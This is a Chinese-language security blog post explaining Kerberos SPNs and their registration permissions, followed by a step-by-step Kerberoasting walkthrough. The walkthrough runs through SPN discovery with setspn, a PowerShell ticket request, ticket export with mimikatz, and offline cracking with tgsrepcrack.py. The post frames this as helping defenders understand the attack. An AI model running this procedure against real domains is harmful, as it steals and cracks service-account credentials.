安全技術 | 域滲透之SPN

廣州錦行科技發表於2020-10-19

Kerberos 身份驗證使用 SPN 將服務例項與服務登入帳戶相關聯。在內網中,SPN掃描透過查詢向域控伺服器執行服務發現,可以識別正在執行重要服務的主機,如終端,交換機等。SPN的識別是Kerberoasting攻擊的第一步。本文由錦行科技的安全研究團隊提供,旨在透過對SPN進行介紹,幫助大家深入瞭解Kerberoasting攻擊過程以應對該種攻擊。


SPN

SPN(ServicePrincipal Names)服務主體名稱,是服務例項(比如:HTTP、SMB、MySQL等服務)的唯一識別符號。Kerberos認證過程使用SPN將服務例項與服務登入賬戶相關聯,如果想使用 Kerberos 協議來認證服務,那麼必須正確配置SPN。


SPN分為兩種型別:
1.一種是註冊在活動目錄的機器帳戶(Computers)下,當一個服務的許可權為 Local System 或 Network Service,則SPN註冊在機器帳戶(Computers)下。
2.一種是註冊在活動目錄的域使用者帳戶(Users)下,當一個服務的許可權為一個域使用者,則SPN註冊在域使用者帳戶(Users)下。

安全技術 | 域滲透之SPN


SQLServer在每次啟動的時候,都會去嘗試用自己的啟動賬號註冊SPN


在Windows域裡,預設普通機器賬號有權註冊SPN:

域:test.com
機器名:W10b
域機器賬號(system)
(手動註冊)成功註冊

安全技術 | 域滲透之SPN


普通域使用者賬號是沒有權註冊SPN:
域:test.com
機器名:W10b
普通域使用者:test\fw
(手動註冊)許可權不夠

安全技術 | 域滲透之SPN


這就會導致這樣一個現象,SQL Server如果使用“Local System account”來啟動,Kerberos就能夠成功,因為SQL Server這時可以在DC上註冊SPN。如果用一個普通域使用者來啟動,Kerberos就不能成功,因為這時SPN註冊不上去。

在DC上為域賬號賦予 “Read servicePrincipalName” 和 “Write serverPrincipalName” 的許可權

安全技術 | 域滲透之SPN

安全技術 | 域滲透之SPN

安全技術 | 域滲透之SPN


勾上serverPrincipalName的讀寫許可權:

安全技術 | 域滲透之SPN


再次使用普通域使用者註冊,成功註冊

安全技術 | 域滲透之SPN


 Kerberoasting攻擊

域內的任何一臺主機使用者或普通域使用者,都可以透過查詢SPN,向域內的所有服務請求TGS,然後進行暴力破解,但是對於破解出的明文,只有域使用者的是可以利用的,機器賬戶的不能用於遠端連線,所以我們的關注點主要就在域使用者下注冊的SPN。


發現SPN


Setspn -Q */*


安全技術 | 域滲透之SPN


請求SPN

(powershell)


Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sqlsrv.test.com:1433"


安全技術 | 域滲透之SPN


匯出票據


mimikatz # kerberos::list /export


安全技術 | 域滲透之SPN



破解票據

https://github.com/nidem/kerberoast


python3 tgsrepcrack.py pass.txt "2-40a10000-w10a$@MSSQLSvc~sqlsrv.test.com~1433-TEST.COM.kirbi"


安全技術 | 域滲透之SPN


如果得到的是一個有權註冊SPN的域賬號,也可以透過手動註冊的方式來進行Kerberoasting攻擊。

相關文章